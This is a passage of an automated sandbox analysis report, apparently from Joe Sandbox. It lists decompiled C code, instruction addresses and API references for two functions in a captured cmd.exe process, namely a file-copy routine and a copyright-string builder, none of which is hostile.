				memset( &_v1096, 0, 0x104);
				_t431 = _t428 + 0x24;
				if(E011E0C70( &_v1632, ((0 | _v1108 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v560, ((0 | _v36 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1096, ((0 | _v572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L141:
					E011E0DE8(E011E0DE8(E011E0DE8(_t214,  &_v1096),  &_v560),  &_v1632);
					_t218 = _t316;
				} else {
					_t214 = E011D585F(0xfe00,  &_v1648, 0);
					_v1668 = _t214;
					if(_t214 == 0) {
						goto L141;
					} else {
						if( *0x11fd560 == 0) {
							_t232 = _v1648;
							goto L17;
						} else {
							_v1652 = _v1648;
							_t214 = E011D585F(_v1648,  &_v1668, 1);
							_v1652 = _t214;
							if(_t214 != 0) {
								if(_v1648 >= _v1668) {
									_t232 = _v1668;
									L17:
									_v1652 = _t232;
								}
								_t421 =  *(_t419 + 0x20);
								_v1648 = _t421;
								while(1) {
									_t214 = E011DAD44( *_t421);
									if(_t214 != 0) {
										break;
									}
									_t421 = _t421[8];
									_v1648 = _t421;
									if(_t421 != 0) {
										continue;
									} else {
										_t316 = _t214;
										goto L141;
									}
									goto L142;
								}
								_t391 =  *_t421;
								__eflags = 0;
								E011E68BA(E011E6A00,  *_t421, 0x21, 0, _t421[6],  &_v1664);
								while(1) {
									_t421[7] = _t421[7] & 0xffff3fff;
									_t236 = _t421[7];
									__eflags = _t236 & 0x00000004;
									if((_t236 & 0x00000004) != 0) {
										_t307 = _t236 & 0xfffffffb | 0x00000002;
										__eflags = _t307;
										_t421[7] = _t307;
									}
									__eflags =  *0x11fd544;
									if( *0x11fd544 != 0) {
										break;
									}
									_t391 = _v40;
									__eflags = _v40;
									if(_v40 == 0) {
										_t391 =  &_v560;
									}
									_t237 = E011D579C(_t421, _t391, _v32);
									__eflags = _t237 - _t316;
									if(_t237 == _t316) {
										break;
									} else {
										_push(_t421[1]);
										E011E25D9(L"%s\r\n");
										_t239 = _v1112;
										__eflags = _t239;
										if(_t239 == 0) {
											_t239 =  &_v1632;
										}
										_t391 = _v1640;
										_t240 = E011D5226(_t421, _v1640, _t239, _v1104, 0);
										__eflags = _t240 - _t316;
										if(_t240 == _t316) {
											break;
										} else {
											_t392 = _v1112;
											_t241 = _t392;
											__eflags = _t392;
											if(_t392 == 0) {
												_t241 =  &_v1632;
											}
											__eflags =  *_t241;
											if( *_t241 != 0) {
												__eflags = _t392;
												if(_t392 == 0) {
													_t392 =  &_v1632;
												}
												_t244 = E011F8F66(_t421[1], _t392);
												_t346 = _t421[1];
												__eflags = _t244;
												if(_t244 == 0) {
													_t422 = E011D5DB5(_t346, (_t421[7] & 0x00000800) << 0xa, _t346, _t346);
													__eflags = _t422 - 0xffffffff;
													if(_t422 == 0xffffffff) {
														E011DCD27(_v1664);
														L135:
														_t348 = 0x6e;
														E011F985A(_t348);
														L130:
														__eflags = 0;
														E011F85E9(0, _t316);
														L131:
														E011DCD27(_v1664);
														E011DDB92(_t422);
														_t352 = _v1668;
														L129:
														E011DDB92(_t352);
														goto L130;
													}
													_t252 = E011E0178(_t245);
													__eflags = _t252;
													if(_t252 == 0) {
														_t354 = _v1652;
													} else {
														_t354 = 0x80;
														_v1652 = 0x80;
													}
													_t253 = _v1112;
													__eflags = _t253;
													if(_t253 == 0) {
														_t253 =  &_v1632;
													}
													_t415 = _v1648;
													_t255 = E011D5712(_t422, _v1660, _t354,  &_v1656, _v1648, _t413, _t253);
													__eflags =  *0x1213cf0;
													_v1656 = _t255;
													if( *0x1213cf0 != 0) {
														_t356 = _v1664;
														L137:
														E011DCD27(_t356);
														_t357 = _t422;
														L134:
														E011DDB92(_t357);
														goto L135;
													}
													_t358 = _v1112;
													__eflags = _t358;
													if(_t358 == 0) {
														_t358 =  &_v1632;
													}
													_t258 = GetFileAttributesW(_t358);
													_t359 = _v1112;
													__eflags = _t258 & 0x00000002;
													if((_t258 & 0x00000002) != 0) {
														__eflags = _t359;
														if(_t359 == 0) {
															_t359 =  &_v1632;
														}
														_t360 = E011D5DB5(_t359, _t316, _t359, _t359);
														_v1680 = _t360;
														_v1676 = _t360;
													} else {
														__eflags = _t359;
														if(__eflags == 0) {
															_t359 =  &_v1632;
														}
														_t303 = E011D43A0(_t359, __eflags);
														_v1672 = _t303;
														_v1668 = _t303;
														__eflags = _t303 - 0xffffffff;
														if(_t303 == 0xffffffff) {
															L136:
															_t356 = _v1664;
															goto L137;
														}
														__imp___get_osfhandle(_t303);
														SetEndOfFile(_t303);
														_t360 = _v1672;
													}
													__eflags = _t360 - 0xffffffff;
													if(_t360 == 0xffffffff) {
														goto L136;
													}
													__eflags =  *0x11fd5cc;
													if( *0x11fd5cc == 0) {
														L69:
														_t260 = _v1636;
														while(1) {
															__eflags = _t260 - _t316;
															if(_t260 != _t316) {
																goto L84;
															}
															_t291 = _v1112;
															__eflags = _t291;
															if(_t291 == 0) {
																_t291 =  &_v1632;
															}
															_t292 = E011F916C(_t360, _v1660, _v1656, _t291, _t422);
															__eflags =  *0x11fd560;
															_t382 = _v1684;
															if( *0x11fd560 != 0) {
																_t295 = E011E0178(_t292);
																__eflags = _t295;
																if(_t295 != 0) {
																	_t382 = _v1672;
																} else {
																	_t408 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t408 =  &_v1632;
																	}
																	_t296 = E011F84FE(_t295, _t408, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t296 - _t316;
																	if(_t296 == _t316) {
																		goto L131;
																	}
																	_t382 = _v1668;
																	_v1672 = _v1668;
																}
															}
															_t293 = _v1112;
															__eflags = _t293;
															if(_t293 == 0) {
																_t293 =  &_v1632;
															}
															_t260 = E011D5712(_t422, _v1660, _v1652,  &_v1656, _t415, _t382, _t293);
															__eflags =  *0x11fd5cc;
															if( *0x11fd5cc == 0) {
																_t360 = _v1672;
																continue;
															}
															goto L84;
														}
													} else {
														__eflags = _v1656;
														if(_v1656 > 0) {
															_t297 = _v1112;
															__eflags = _t297;
															if(_t297 == 0) {
																_t297 =  &_v1632;
															}
															_t298 = E011F916C(_t360, _v1660, _v1656, _t297, _t422);
															__eflags =  *0x11fd560;
															_t360 = _v1684;
															if( *0x11fd560 != 0) {
																_t299 = E011E0178(_t298);
																__eflags = _t299;
																if(_t299 != 0) {
																	_t360 = _v1672;
																} else {
																	_t410 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t410 =  &_v1632;
																	}
																	_t300 = E011F84FE(_t299, _t410, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t300 - _t316;
																	if(_t300 == _t316) {
																		E011DCD27(_v1664);
																		E011DDB92(_t422);
																		_t352 = _v1668;
																		goto L129;
																	}
																	_t360 = _v1668;
																	_v1672 = _v1668;
																}
															}
														}
														__eflags =  *0x11fd5cc;
														if( *0x11fd5cc == 0) {
															goto L69;
														}
													}
													L84:
													__eflags = 0;
													 *0x11fd5cc = 0;
													E011DDB92(_t422);
													_t421 = _v1648;
												} else {
													_t305 = E011F8E52(_t421, _v1660, _v1652);
													_v1680 = _t305;
													_v1676 = _t305;
												}
												_t416 = _t421[8];
												_t263 = 0;
												 *0x11fd564 = 0;
												__eflags = _t416;
												if(_t416 != 0) {
													do {
														_t265 =  *(_t416 + 0x1c);
														__eflags = _t265 & 0x00000004;
														if((_t265 & 0x00000004) != 0) {
															_t290 = _t265 & 0xfffffffb | 0x00000002;
															__eflags = _t290;
															 *(_t416 + 0x1c) = _t290;
														}
														_t363 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t363 =  &_v1096;
														}
														_t266 = E011D5400(_t363, _v568,  *_t416, _t421[1]);
														__eflags = _t266;
														if(_t266 == 0) {
															_t267 = _v576;
															__eflags = _t267;
															if(_t267 == 0) {
																_t267 =  &_v1096;
															}
															_push(_t267);
															E011E25D9(L"%s\r\n");
														} else {
															_push(0);
															_push(_t266);
															E011DC108(0);
														}
														_t366 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t366 =  &_v1096;
														}
														_t269 = E011DAD44(_t366);
														__eflags = _t269;
														if(_t269 != 0) {
															_t401 = _v1112;
															__eflags = _v1112;
															if(_v1112 == 0) {
																_t401 =  &_v1632;
															}
															_t367 = _v576;
															__eflags = _v576;
															if(_v576 == 0) {
																_t367 =  &_v1096;
															}
															_t270 = E011F8F66(_t367, _t401);
															__eflags = _t270;
															if(_t270 == 0) {
																_t368 = _v576;
																__eflags = _t368;
																if(_t368 == 0) {
																	_t368 =  &_v1096;
																}
																_t422 = E011D5DB5(_t368, 0, _t368, _t368);
																__eflags = _t422 - 0xffffffff;
																if(_t422 == 0xffffffff) {
																	E011DCD27(_v1664);
																	_t357 = _v1672;
																	goto L134;
																}
																_t273 = E011E0178(_t271);
																__eflags = _t273;
																if(_t273 == 0) {
																	L120:
																	_t371 = _v1652;
																} else {
																	_t371 = 0x80;
																	_v1652 = 0x80;
																}
																__eflags =  *0x11fd5cc;
																if( *0x11fd5cc == 0) {
																	_t274 = _v1112;
																	__eflags = _t274;
																	if(_t274 == 0) {
																		_t274 =  &_v1632;
																	}
																	_t276 = E011D5712(_t422, _v1660, _t371,  &_v1656, _t416, _v1672, _t274);
																	__eflags = _t276;
																	if(_t276 != 0) {
																		_t279 = _v1112;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			_t279 =  &_v1632;
																		}
																		_t280 = E011F916C(_v1672, _v1660, _v1656, _t279, _t422);
																		__eflags =  *0x11fd560;
																		if( *0x11fd560 != 0) {
																			_t281 = E011E0178(_t280);
																			__eflags = _t281;
																			if(_t281 == 0) {
																				_t405 = _v1112;
																				__eflags = _v1112;
																				if(__eflags == 0) {
																					_t405 =  &_v1632;
																				}
																				_t282 = E011F84FE(_t281, _t405, __eflags, _v1656, _v1660, _v1644);
																				__eflags = _t282 - _t316;
																				if(_t282 == _t316) {
																					E011DCD27(_v1664);
																					E011DDB92(_t422);
																					_t352 = _v1668;
																					goto L129;
																				}
																				_v1672 = _v1668;
																			}
																		}
																		goto L120;
																	}
																}
																__eflags = 0;
																 *0x11fd5cc = 0;
																E011DDB92(_t422);
																_t421 = _v1648;
															} else {
																_push(0);
																_push(0x2340);
																E011DC108(_t367);
															}
														}
														_t416 =  *(_t416 + 0x20);
														__eflags = _t416;
													} while (_t416 != 0);
													_t263 = 0;
													__eflags = 0;
												}
												_t413 = _v1672;
												E011D56AE(_t421, _v1640, _v1672, _t263);
											}
											_t391 = _t421[6];
											_t242 = E011E6A1C(E011E6A00, _t421[6], 0x21, _v1664);
											__eflags = _t242;
											if(_t242 != 0) {
												continue;
											} else {
												E011DCD27(_v1664);
												__imp__??_V@YAXPAX@Z(_v576);
												__imp__??_V@YAXPAX@Z(_v40);
												__imp__??_V@YAXPAX@Z(_v1112);
												_t218 = 0;
											}
										}
									}
									goto L142;
								}
								_t214 = E011DCD27(_v1664);
							}
							goto L141;
						}
					}
				}
				L142:
				_pop(_t414);
				_pop(_t420);
				_pop(_t317);
				return E011E6FD0(_t218, _t317, _v20 ^ _t431, _t391, _t414, _t420);
			}




































































































                                    0x011f85e9
                                    0x011f85e9
                                    0x011f85ec
                                    0x011f85f0
                                    0x011f85f2
                                    0x011f85f4
                                    0x011f85f5
                                    0x011f85fb
                                    0x011f85fb
                                    0x011f85ff
                                    0x011f8607
                                    0x011f8617
                                    0x011f8624
                                    0x011f8629
                                    0x011f8629
                                    0x011f8633
                                    0x011f8649
                                    0x011f8649
                                    0x011f864e
                                    0x011f8654
                                    0x00000000
                                    0x00000000
                                    0x011f8640
                                    0x011f8644
                                    0x011f8644
                                    0x011f865d
                                    0x011f8663
                                    0x011f866c
                                    0x011f8672
                                    0x011f8679
                                    0x011f8681
                                    0x011f8682
                                    0x011f8688
                                    0x011f868d
                                    0x011f868f
                                    0x011f869e
                                    0x011f86a3
                                    0x011f86a4
                                    0x011f86ac
                                    0x011f86af
                                    0x011f86b6
                                    0x011f86be
                                    0x011f86cc
                                    0x011f86d3
                                    0x011f86e4
                                    0x011f86ec
                                    0x011f86fa
                                    0x011f8701
                                    0x011f8712
                                    0x011f871d
                                    0x011f873d
                                    0x011f8e1a
                                    0x011f8e36
                                    0x011f8e3b
                                    0x011f879b
                                    0x011f87a8
                                    0x011f87ad
                                    0x011f87b3
                                    0x00000000
                                    0x011f87b9
                                    0x011f87c0
                                    0x011f87f3
                                    0x00000000
                                    0x011f87c2
                                    0x011f87ce
                                    0x011f87d2
                                    0x011f87d7
                                    0x011f87dd
                                    0x011f87eb
                                    0x011f87ed
                                    0x011f87f7
                                    0x011f87f7
                                    0x011f87f7
                                    0x011f87fb
                                    0x011f87fe
                                    0x011f8802
                                    0x011f8804
                                    0x011f880b
                                    0x00000000
                                    0x00000000
                                    0x011f880d
                                    0x011f8810
                                    0x011f8816
                                    0x00000000
                                    0x011f8818
                                    0x011f8818
                                    0x00000000
                                    0x011f8818
                                    0x00000000
                                    0x011f8816
                                    0x011f881f
                                    0x011f8829
                                    0x011f8833
                                    0x011f8838
                                    0x011f8838
                                    0x011f883f
                                    0x011f8842
                                    0x011f8844
                                    0x011f8849
                                    0x011f8849
                                    0x011f884c
                                    0x011f884c
                                    0x011f884f
                                    0x011f8856
                                    0x00000000
                                    0x00000000
                                    0x011f885c
                                    0x011f8863
                                    0x011f8865
                                    0x011f8867
                                    0x011f8867
                                    0x011f8877
                                    0x011f887c
                                    0x011f887e
                                    0x00000000
                                    0x011f8884
                                    0x011f8884
                                    0x011f888c
                                    0x011f8891
                                    0x011f889a
                                    0x011f889c
                                    0x011f889e
                                    0x011f889e
                                    0x011f88a2
                                    0x011f88b2
                                    0x011f88b7
                                    0x011f88b9
                                    0x00000000
                                    0x011f88bf
                                    0x011f88bf
                                    0x011f88c6
                                    0x011f88c8
                                    0x011f88ca
                                    0x011f88cc
                                    0x011f88cc
                                    0x011f88d2
                                    0x011f88d5
                                    0x011f88db
                                    0x011f88dd
                                    0x011f88df
                                    0x011f88df
                                    0x011f88e6
                                    0x011f88eb
                                    0x011f88ee
                                    0x011f88f0
                                    0x011f8921
                                    0x011f8923
                                    0x011f8926
                                    0x011f8e0a
                                    0x011f8de9
                                    0x011f8deb
                                    0x011f8dec
                                    0x011f8da2
                                    0x011f8da4
                                    0x011f8da6
                                    0x011f8dab
                                    0x011f8daf
                                    0x011f8db6
                                    0x011f8dbb
                                    0x011f8d9d
                                    0x011f8d9d
                                    0x00000000
                                    0x011f8d9d
                                    0x011f892e
                                    0x011f8933
                                    0x011f8935
                                    0x011f8942
                                    0x011f8937
                                    0x011f8937
                                    0x011f893c
                                    0x011f893c
                                    0x011f8946
                                    0x011f894d
                                    0x011f894f
                                    0x011f8951
                                    0x011f8951
                                    0x011f895b
                                    0x011f8968
                                    0x011f896d
                                    0x011f8974
                                    0x011f8978
                                    0x011f8e00
                                    0x011f8df7
                                    0x011f8df7
                                    0x011f8dfc
                                    0x011f8de4
                                    0x011f8de4
                                    0x00000000
                                    0x011f8de4
                                    0x011f897e
                                    0x011f8985
                                    0x011f8987
                                    0x011f8989
                                    0x011f8989
                                    0x011f898e
                                    0x011f8994
                                    0x011f899b
                                    0x011f899d
                                    0x011f89d2
                                    0x011f89d4
                                    0x011f89d6
                                    0x011f89d6
                                    0x011f89e3
                                    0x011f89e5
                                    0x011f89e9
                                    0x011f899f
                                    0x011f899f
                                    0x011f89a1
                                    0x011f89a3
                                    0x011f89a3
                                    0x011f89a7
                                    0x011f89ac
                                    0x011f89b0
                                    0x011f89b4
                                    0x011f89b7
                                    0x011f8df3
                                    0x011f8df3
                                    0x00000000
                                    0x011f8df3
                                    0x011f89be
                                    0x011f89c6
                                    0x011f89cc
                                    0x011f89cc
                                    0x011f89ed
                                    0x011f89f0
                                    0x00000000
                                    0x00000000
                                    0x011f89f6
                                    0x011f89fd
                                    0x011f8a85
                                    0x011f8a85
                                    0x011f8a8f
                                    0x011f8a8f
                                    0x011f8a91
                                    0x00000000
                                    0x00000000
                                    0x011f8a97
                                    0x011f8a9e
                                    0x011f8aa0
                                    0x011f8aa2
                                    0x011f8aa2
                                    0x011f8ab0
                                    0x011f8ab5
                                    0x011f8abc
                                    0x011f8ac0
                                    0x011f8ac2
                                    0x011f8ac7
                                    0x011f8ac9
                                    0x011f8b01
                                    0x011f8acb
                                    0x011f8acb
                                    0x011f8ad2
                                    0x011f8ad4
                                    0x011f8ad6
                                    0x011f8ad6
                                    0x011f8aea
                                    0x011f8aef
                                    0x011f8af1
                                    0x00000000
                                    0x00000000
                                    0x011f8af7
                                    0x011f8afb
                                    0x011f8afb
                                    0x011f8ac9
                                    0x011f8b05
                                    0x011f8b0c
                                    0x011f8b0e
                                    0x011f8b10
                                    0x011f8b10
                                    0x011f8b26
                                    0x011f8b2b
                                    0x011f8b32
                                    0x011f8a8b
                                    0x00000000
                                    0x011f8a8b
                                    0x00000000
                                    0x011f8b32
                                    0x011f8a03
                                    0x011f8a03
                                    0x011f8a08
                                    0x011f8a0a
                                    0x011f8a11
                                    0x011f8a13
                                    0x011f8a15
                                    0x011f8a15
                                    0x011f8a23
                                    0x011f8a28
                                    0x011f8a2f
                                    0x011f8a33
                                    0x011f8a35
                                    0x011f8a3a
                                    0x011f8a3c
                                    0x011f8a74
                                    0x011f8a3e
                                    0x011f8a3e
                                    0x011f8a45
                                    0x011f8a47
                                    0x011f8a49
                                    0x011f8a49
                                    0x011f8a5d
                                    0x011f8a62
                                    0x011f8a64
                                    0x011f8d8d
                                    0x011f8d94
                                    0x011f8d99
                                    0x00000000
                                    0x011f8d99
                                    0x011f8a6a
                                    0x011f8a6e
                                    0x011f8a6e
                                    0x011f8a3c
                                    0x011f8a33
                                    0x011f8a78
                                    0x011f8a7f
                                    0x00000000
                                    0x00000000
                                    0x011f8a7f
                                    0x011f8b38
                                    0x011f8b38
                                    0x011f8b3c
                                    0x011f8b41
                                    0x011f8b46
                                    0x011f88f2
                                    0x011f88fc
                                    0x011f8901
                                    0x011f8905
                                    0x011f8905
                                    0x011f8b4a
                                    0x011f8b4d
                                    0x011f8b4f
                                    0x011f8b54
                                    0x011f8b56
                                    0x011f8b5c
                                    0x011f8b5c
                                    0x011f8b5f
                                    0x011f8b61
                                    0x011f8b66
                                    0x011f8b66
                                    0x011f8b69
                                    0x011f8b69
                                    0x011f8b6c
                                    0x011f8b73
                                    0x011f8b75
                                    0x011f8b77
                                    0x011f8b77
                                    0x011f8b8a
                                    0x011f8b8f
                                    0x011f8b91
                                    0x011f8b9e
                                    0x011f8ba5
                                    0x011f8ba7
                                    0x011f8ba9
                                    0x011f8ba9
                                    0x011f8bb0
                                    0x011f8bb6
                                    0x011f8b93
                                    0x011f8b95
                                    0x011f8b96
                                    0x011f8b97
                                    0x011f8b97
                                    0x011f8bbd
                                    0x011f8bc4
                                    0x011f8bc6
                                    0x011f8bc8
                                    0x011f8bc8
                                    0x011f8bcf
                                    0x011f8bd4
                                    0x011f8bd6
                                    0x011f8bdc
                                    0x011f8be3
                                    0x011f8be5
                                    0x011f8be7
                                    0x011f8be7
                                    0x011f8beb
                                    0x011f8bf2
                                    0x011f8bf4
                                    0x011f8bf6
                                    0x011f8bf6
                                    0x011f8bfd
                                    0x011f8c02
                                    0x011f8c04
                                    0x011f8c1a
                                    0x011f8c21
                                    0x011f8c23
                                    0x011f8c25
                                    0x011f8c25
                                    0x011f8c35
                                    0x011f8c37
                                    0x011f8c3a
                                    0x011f8ddb
                                    0x011f8de0
                                    0x00000000
                                    0x011f8de0
                                    0x011f8c42
                                    0x011f8c47
                                    0x011f8c49
                                    0x011f8cf3
                                    0x011f8cf3
                                    0x011f8c4f
                                    0x011f8c4f
                                    0x011f8c54
                                    0x011f8c54
                                    0x011f8cf7
                                    0x011f8cfe
                                    0x011f8c5d
                                    0x011f8c64
                                    0x011f8c66
                                    0x011f8c68
                                    0x011f8c68
                                    0x011f8c7e
                                    0x011f8c83
                                    0x011f8c85
                                    0x011f8c87
                                    0x011f8c8e
                                    0x011f8c90
                                    0x011f8c92
                                    0x011f8c92
                                    0x011f8ca4
                                    0x011f8ca9
                                    0x011f8cb0
                                    0x011f8cb6
                                    0x011f8cbb
                                    0x011f8cbd
                                    0x011f8cbf
                                    0x011f8cc6
                                    0x011f8cc8
                                    0x011f8cca
                                    0x011f8cca
                                    0x011f8cde
                                    0x011f8ce3
                                    0x011f8ce5
                                    0x011f8dc5
                                    0x011f8dcc
                                    0x011f8dd1
                                    0x00000000
                                    0x011f8dd1
                                    0x011f8cef
                                    0x011f8cef
                                    0x011f8cbd
                                    0x00000000
                                    0x011f8cb0
                                    0x011f8c85
                                    0x011f8d04
                                    0x011f8d08
                                    0x011f8d0d
                                    0x011f8d12
                                    0x011f8c06
                                    0x011f8c08
                                    0x011f8c09
                                    0x011f8c0e
                                    0x011f8c14
                                    0x011f8c04
                                    0x011f8d16
                                    0x011f8d19
                                    0x011f8d19
                                    0x011f8d21
                                    0x011f8d21
                                    0x011f8d21
                                    0x011f8d23
                                    0x011f8d2f
                                    0x011f8d2f
                                    0x011f8d38
                                    0x011f8d42
                                    0x011f8d47
                                    0x011f8d49
                                    0x00000000
                                    0x011f8d4f
                                    0x011f8d53
                                    0x011f8d5f
                                    0x011f8d6d
                                    0x011f8d7b
                                    0x011f8d82
                                    0x011f8d82
                                    0x011f8d49
                                    0x011f88b9
                                    0x00000000
                                    0x011f887e
                                    0x011f8e15
                                    0x011f8e15
                                    0x00000000
                                    0x011f87dd
                                    0x011f87c0
                                    0x011f87b3
                                    0x011f8e3d
                                    0x011f8e44
                                    0x011f8e45
                                    0x011f8e46
                                    0x011f8e51

                                    APIs
                                    • longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                    • memset.MSVCRT ref: 011F86B6
                                    • memset.MSVCRT ref: 011F86E4
                                    • memset.MSVCRT ref: 011F8712
                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011D585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,011F87AD,?,00000000,-00000105,-00000105,-00000105), ref: 011D5875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$AllocCloseFindVirtuallongjmp
                                    • String ID: %9d
                                    • API String ID: 973120493-2241623522
                                    • Opcode ID: af42e88ca2e9f14b4f30493f72a61aec06a2a1af03033cb19f9ae5cdeb0f0d5c
                                    • Instruction ID: 07a11b7b33a58720572a15f09c5808ba03a2de520c30c490bd93c67c36ebebe5
                                    • Opcode Fuzzy Hash: af42e88ca2e9f14b4f30493f72a61aec06a2a1af03033cb19f9ae5cdeb0f0d5c
                                    • Instruction Fuzzy Hash: CD51F8B1A087819BD32CDF74D8856AF7BE9EB94318F04092EF689D3240EB74D940CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6456, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 125memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E011F6456(void* __eflags) {
				signed int _v8;
				char _v68;
				void* _v72;
				signed int _v76;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t28;
				signed int _t30;
				void _t31;
				signed int _t36;
				void* _t38;
				short _t39;
				short _t40;
				signed int _t41;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t47;
				signed int _t49;
				void* _t53;
				signed int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t61;
				signed int _t65;
				void* _t66;
				signed int _t70;

				_t21 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t21 ^ _t70;
				_t49 = 0xe;
				_t67 = "Copyright (c) Microsoft Corporation. All rights reserved.";
				memcpy( &_v68, "Copyright (c) Microsoft Corporation. All rights reserved.", _t49 << 2);
				asm("movsw");
				_t65 = 0;
				_t47 = 0;
				if(E011E7735(0) == 0) {
					if(RtlCreateUnicodeStringFromAsciiz( &_v84,  &_v68) == 0) {
						goto L26;
					} else {
						_t67 = _v80;
						_v72 = _t67;
						goto L4;
					}
				} else {
					_t46 =  *0x121c000(L"%WINDOWS_COPYRIGHT%");
					_t67 = _t46;
					_v72 = _t46;
					L4:
					if(_t67 == 0) {
						L26:
						_t28 = 0;
					} else {
						_t30 =  *_t67 & 0x0000ffff;
						_t60 = _t67;
						if(_t30 != 0) {
							_t58 = _t30;
							do {
								if(_t58 == 0xae || _t58 == 0xa9) {
									_t43 = 1;
								} else {
									_t43 = _t65;
								}
								_t60 = _t60 + 2;
								_t47 = _t47 + _t43;
								_t44 =  *_t60 & 0x0000ffff;
								_t58 = _t44;
							} while (_t44 != 0);
							_t67 = _v72;
						}
						_t53 = _t67;
						_t59 = _t53 + 2;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
						} while (_t31 != _t65);
						_t47 = GlobalAlloc(0x40, 2 + ((_t53 - _t59 >> 1) + _t47 * 2) * 2);
						_v76 = _t47;
						if(_t47 != 0) {
							_t36 =  *_t67 & 0x0000ffff;
							_t66 = _t67;
							_t56 = _t47;
							if(_t36 != 0) {
								_t61 = _t36;
								do {
									if(_t61 == 0xae || _t61 == 0xa9) {
										_t38 = 0x28;
										 *_t56 = _t38;
										_t39 = 0x63;
										 *((short*)(_t56 + 2)) = _t39;
										_t57 = _t56 + 4;
										_t40 = 0x29;
										 *_t57 = _t40;
									} else {
										 *_t56 = _t61;
									}
									_t66 = _t66 + 2;
									_t56 = _t57 + 2;
									_t41 =  *_t66 & 0x0000ffff;
									_t61 = _t41;
								} while (_t41 != 0);
								_t67 = _v72;
								_t47 = _v76;
							}
							_t65 = _t47;
							 *_t56 = 0;
						}
						GlobalFree(_t67);
						_t28 = _t65;
					}
				}
				return E011E6FD0(_t28, _t47, _v8 ^ _t70, _t59, _t65, _t67);
			}




































                                    0x011f645e
                                    0x011f6465
                                    0x011f646d
                                    0x011f646e
                                    0x011f6476
                                    0x011f6478
                                    0x011f647a
                                    0x011f647c
                                    0x011f6485
                                    0x011f64a9
                                    0x00000000
                                    0x011f64af
                                    0x011f64af
                                    0x011f64b2
                                    0x00000000
                                    0x011f64b2
                                    0x011f6487
                                    0x011f648c
                                    0x011f6492
                                    0x011f6494
                                    0x011f64b5
                                    0x011f64b7
                                    0x011f6589
                                    0x011f6589
                                    0x011f64bd
                                    0x011f64bd
                                    0x011f64c0
                                    0x011f64c5
                                    0x011f64c7
                                    0x011f64ce
                                    0x011f64d1
                                    0x011f64e3
                                    0x011f64dd
                                    0x011f64dd
                                    0x011f64dd
                                    0x011f64e4
                                    0x011f64e7
                                    0x011f64e9
                                    0x011f64ec
                                    0x011f64ee
                                    0x011f64f3
                                    0x011f64f3
                                    0x011f64f6
                                    0x011f64f8
                                    0x011f64fb
                                    0x011f64fb
                                    0x011f64fe
                                    0x011f6501
                                    0x011f651d
                                    0x011f651f
                                    0x011f6524
                                    0x011f6526
                                    0x011f6529
                                    0x011f652b
                                    0x011f6530
                                    0x011f6537
                                    0x011f653c
                                    0x011f653f
                                    0x011f654d
                                    0x011f654e
                                    0x011f6553
                                    0x011f6554
                                    0x011f6558
                                    0x011f655d
                                    0x011f655e
                                    0x011f6546
                                    0x011f6546
                                    0x011f6546
                                    0x011f6561
                                    0x011f6564
                                    0x011f6567
                                    0x011f656a
                                    0x011f656c
                                    0x011f6571
                                    0x011f6574
                                    0x011f6574
                                    0x011f6579
                                    0x011f657b
                                    0x011f657b
                                    0x011f657f
                                    0x011f6585
                                    0x011f6585
                                    0x011f64b7
                                    0x011f659b

                                    APIs
                                    • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 011F64A1
                                    • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 011F6517
                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011F657F
                                    Strings
                                    • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 011F646E
                                    • %WINDOWS_COPYRIGHT%, xrefs: 011F6487
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                    • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                    • API String ID: 1103618819-4062316587
                                    • Opcode ID: fcdebe67506d7c5edcd2f9c8988b51216db60d79dd470bc185e1a4cce3491c86
